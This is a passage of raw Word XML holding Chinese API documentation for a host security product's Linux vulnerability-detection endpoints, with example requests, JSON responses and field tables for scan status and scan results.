        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF8F39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55264C61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D1ACD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A0416" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BA31F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDC205" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C8E08E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Running|Success|Failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B7DE8"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B6E8A5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CF9EA59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA03399" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EE83133" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CB44957" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61F4377E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ABCF4B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E048ED4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE85B5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="600604D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>"执行中;成功;失败"，最近一次漏洞检测扫描job执行状态，如果从未执行过漏洞检测扫描job，状态为Success</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7101CDFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc115166186"/>
      <w:bookmarkStart w:id="224" w:name="查询漏洞检测结果"/>
      <w:bookmarkEnd w:id="222"/>
      <w:r>
        <w:t>查询漏洞检测结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w14:paraId="6D484E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2E52F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>list</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="464EF3BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE9BEA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43E575" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C69CB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C76B87A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618FE94C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "d27260c9bb52d82c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.184",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yongliang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "5c3d9930871e1b31a1c5c2c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042014001964",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "charts": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F605AA"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2439A33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1442AAB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F25A8C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12C8BF26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A59DB2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67273E33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="523831DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50DD581A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5689CA77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F291C15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E998113" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="678A0C02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35FB8EA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E9B9188" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="012AB61F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55D3AE17" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F9B07D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F470A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16923D7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="034DAC32" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1639E586" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CA7D7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573C88FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48601951" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29B8163D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7643D912" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46270478" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61E351AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68C12AC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5592A800" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="37BFA933" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23EB75E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B17348D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6447D4F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C12BF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44673940" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ECACB8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54EF47F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA7EE72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17737BF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D7DB048" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="470C1E85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
